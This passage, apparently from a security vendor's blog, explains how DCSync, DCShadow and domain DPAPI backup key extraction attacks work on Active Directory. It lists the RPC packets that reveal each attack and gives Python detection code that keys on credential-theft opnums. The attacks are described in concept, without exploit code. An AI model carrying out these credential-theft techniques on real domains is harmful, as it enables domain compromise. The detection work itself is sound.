In DCE/RPC, the client first specifies which RPC interface it wants to connect to. Once the bind is complete, the client specifies which RPC procedures it wants to call. In a DCSync attack, the attacker sends a bind request for the DRSUAPI interface and, after the binding process is complete, sends a DsGetNCChanges request to the server, which is a request for AD object updates. Detecting those packets from a non-DC to a DC lets us catch the DCSync attack in real time.
To detect a DCSync attack, we analyze traffic between a non-DC and a DC. We capture the following packets for the detection:
1. DCE/RPC bind request for the DRSUAPI interface:
2. DRSUAPI packet with a DsGetNCChanges request:
DCShadow
MITRE ATT&CK: T1207
Attack name: DCShadow
Common Attacking tools: Mimikatz
In a DCShadow attack, the attacker registers a machine as a DC, which allows them to push changes into the AD environment through replication from the rogue DC to the legitimate DCs. The attacker needs to compromise a Domain Admin or Enterprise Admin account to perform the attack.
After registering the rogue DC, the attacker can change any AD object attribute in the domain.
The attack has many similarities to DCSync. However, while DCSync gives the attacker the ability to read information from the DC, DCShadow allows the attacker to write to and update the DC.
Figure: DCShadow attack using Mimikatz
Detection
Like DCSync, DCShadow uses the DRSUAPI interface. DCShadow calls the following RPC procedures as part of the attack:
- DrsAddEntry: the attacker sets the SPN of the rogue DC to “GC/*” in the domain Configuration partition.
- DrsReplicaAdd: the attacker pushes the modified Active Directory objects to the DC.
To detect DCShadow, we catch a bind request for the DRSUAPI interface and RPC procedure requests for DrsAddEntry and DrsReplicaAdd. If the request originates from a non-DC and targets a DC, we alert.
To detect a DCShadow attack, we analyze traffic between a non-DC and a DC. We capture the following packets for the detection:
1. DCE/RPC bind request for the DRSUAPI interface:
2. DRSUAPI packet with a DrsAddEntry request:
3. DRSUAPI packet with a DrsReplicaAdd request:
Reading the Domain DPAPI Backup Key from a Domain Controller
MITRE ATT&CK: T1555.003
Attack name: Domain DPAPI backup key extraction
Common Attacking tools: Mimikatz, SharpDPAPI, Impacket
Windows provides a mechanism for protecting asymmetric private keys, passwords, and other confidential data. The mechanism, called DPAPI, performs symmetric encryption of data and allows developers to encrypt data without implementing the underlying encryption algorithm themselves. Every Windows user has a DPAPI master key that is used to encrypt and decrypt their data.
Common uses of DPAPI encryption include:
- Network passwords in Credential Manager
- Google Chrome cookies and login data
- User PINs and fingerprint data in Windows 8
- Wi-Fi passwords
- VPN passwords
- Email account passwords
In an AD environment, the user’s DPAPI master key is encrypted with the user’s domain password. Decrypting the DPAPI master key allows an attacker to read all the data protected by DPAPI. The domain controllers provide a backup mechanism to recover domain users’ master keys (for the case of lost passwords): for every domain, the domain controllers hold one public/private key pair associated with DPAPI. Clients in the domain use the domain DPAPI backup public key to encrypt their master key. An attacker who gains access to the domain DPAPI backup private key can decrypt any domain user’s DPAPI master key, and with it reveal all the confidential data encrypted under that master key. The attacker needs admin privileges to extract the domain backup key from a domain controller.
Detection
Attackers use the LsaRetrievePrivateData function of the LSARPC interface to request the domain backup key from the DC. To detect the attack, we capture a DCE/RPC bind request for the LSARPC interface followed by an LsaRetrievePrivateData request sent to the DC.
To detect domain DPAPI backup key extraction, we analyze all the traffic going into the DC and look for attempts to retrieve the domain DPAPI backup key. We capture the following packets for the detection:
1. DCE/RPC bind request for the LSARPC interface:
2. LSARPC packet with an LsaRetrievePrivateData request:
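The three detections above (DCSync, DCShadow, and DPAPI backup key extraction) share one pattern: remember which interface a client bound to, then match the opnum of later requests on that context and alert only when a non-DC talks to a DC. The following is an added example, not code from the blog or from the Fidelis platform; it runs over constructed, already-decoded DCE/RPC events (the kind an NTA sensor emits), the DC addresses are invented, and the interface UUIDs and opnums are taken from the MS-DRSR and MS-LSAD specifications rather than from the page.

```python
from dataclasses import dataclass
# Interface UUIDs and opnums taken from the MS-DRSR and MS-LSAD specifications.
DRSUAPI = "e3514235-4b06-11d1-ab04-00c04fc2dcd2"
LSARPC = "12345778-1234-abcd-ef00-0123456789ab"
WATCHED = {
    (DRSUAPI, 3): "DCSync (DRSGetNCChanges)",
    (DRSUAPI, 17): "DCShadow (DRSAddEntry)",
    (DRSUAPI, 5): "DCShadow (DRSReplicaAdd)",
    (LSARPC, 43): "DPAPI backup key extraction (LsarRetrievePrivateData)",
}
@dataclass
class RpcEvent:            # one decoded DCE/RPC PDU, as an NTA sensor would emit it
    src: str
    dst: str
    kind: str              # "bind" or "request"
    ctx_id: int            # presentation context id carried in the PDU header
    uuid: str = ""         # abstract syntax UUID (bind only)
    opnum: int = -1        # operation number (request only)
def detect(events, dcs):
    """Return (src, dst, label) alerts for watched opnums sent by a non-DC to a DC."""
    bound = {}             # (src, dst, ctx_id) -> interface UUID seen in the bind
    alerts = []
    for e in events:
        key = (e.src, e.dst, e.ctx_id)
        if e.kind == "bind":
            bound[key] = e.uuid.lower()
            continue
        iface = bound.get(key)
        if iface is None:
            continue       # request on a context never bound in this capture: cannot attribute
        label = WATCHED.get((iface, e.opnum))
        # Replication and LSA calls between DCs are legitimate; only non-DC -> DC is suspicious
        if label and e.dst in dcs and e.src not in dcs:
            alerts.append((e.src, e.dst, label))
    return alerts

DCS = {"10.0.0.10", "10.0.0.11"}   # constructed: the domain's DC addresses
SAMPLE = [                          # constructed event stream
    RpcEvent("10.0.0.11", "10.0.0.10", "bind", 0, DRSUAPI),
    RpcEvent("10.0.0.11", "10.0.0.10", "request", 0, opnum=3),   # DC-to-DC replication: benign
    RpcEvent("10.0.5.23", "10.0.0.10", "bind", 0, DRSUAPI),
    RpcEvent("10.0.5.23", "10.0.0.10", "request", 0, opnum=3),   # DCSync
    RpcEvent("10.0.5.23", "10.0.0.10", "request", 0, opnum=17),  # DCShadow: DRSAddEntry
    RpcEvent("10.0.5.23", "10.0.0.10", "request", 0, opnum=5),   # DCShadow: DRSReplicaAdd
    RpcEvent("10.0.5.40", "10.0.0.10", "bind", 1, LSARPC),
    RpcEvent("10.0.5.40", "10.0.0.10", "request", 1, opnum=43),  # backup key request
]
if __name__ == "__main__":
    for src, dst, label in detect(SAMPLE, DCS):
        print(f"ALERT {src} -> {dst}: {label}")
```

Note that DRSUAPI traffic normally runs at RPC packet-privacy level, so the stub data is encrypted; the detection relies only on the bind PDU's interface UUID and the request PDU's context id and opnum, which stay in the clear.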
Conclusion
Threat actors continually innovate, creating novel techniques to gain access to confidential information. AD attacks allow adversaries to elevate privileges and move laterally on a compromised network, which may lead to a full domain compromise. Applying detection rules helps catch attackers early, before any damage is done. To keep your organization safe, ensure your systems are up to date and that you have an automated detection system, such as Fidelis Elevate, in place to proactively defend against cyber threats and active attacks.
Subscribe to the Threat Geek blog for the latest updates, threat research, and industry insights from the professionals at Fidelis Cybersecurity. To see first-hand how the Fidelis Cybersecurity platforms help security teams worldwide protect, detect, respond, and neutralize even the most advanced cyber adversaries across network, endpoints, and cloud, schedule a free demo.